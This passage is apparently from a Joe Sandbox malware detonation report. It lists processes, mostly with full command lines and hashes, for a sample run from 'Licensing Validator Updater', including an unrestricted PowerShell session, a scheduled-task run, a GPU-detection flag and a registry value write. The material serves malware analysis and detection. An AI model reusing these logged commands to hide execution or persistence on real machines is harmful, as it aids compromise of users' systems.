                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:05
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:07
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:08
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:09
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:16
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:22
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x770000
                                                                                                                                                                                                                                                                                                                                                      File size:700'416 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:27
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:27
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:33
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:33
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:42
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:42
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:51
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:powershell -ep Unrestricted
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:18
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:18
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:21
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7dfbc0000
                                                                                                                                                                                                                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:21
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff68cfc0000
                                                                                                                                                                                                                                                                                                                                                      File size:5'900'128 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff68cfc0000
                                                                                                                                                                                                                                                                                                                                                      File size:5'900'128 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff68cfc0000
                                                                                                                                                                                                                                                                                                                                                      File size:5'900'128 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                                                                                      Start time:14:47:02
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:powershell -ep Unrestricted
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                        Function 0000031783A47485 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ef7057cc921d27b2f49bbba4cd2bdfa8f2a53bbf9f6a79269f170c9f8d5c86c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 41ef4a845bea51ebe3c416de2a10216aaf506f4693b8b404e52ee3b8bf0c3b56
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ef7057cc921d27b2f49bbba4cd2bdfa8f2a53bbf9f6a79269f170c9f8d5c86c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B11C43181CE850BFB13AA2CC85BBA5B778EB18304F290149A4598B0C3C562CE558293
                                                                                                                                                                                                                                                                                                                                                        Function 0000031783A44E9E Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 06f50c9dfe00f1ea4e55775f009914b16960cd94d1e9ba7f3ad7f4280cc8101d
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7792f6749f825e0b95aac2c91ecde31e87db3496632acc8c5eab623e5d8541f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06f50c9dfe00f1ea4e55775f009914b16960cd94d1e9ba7f3ad7f4280cc8101d
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11B43190490EAFDF85EBA8C845ADCFBB2FF58320F290119D409E3211D771A8A2DF90
                                                                                                                                                                                                                                                                                                                                                        Function 0000031783A474B0 Relevance: .1, Instructions: 53COMMON
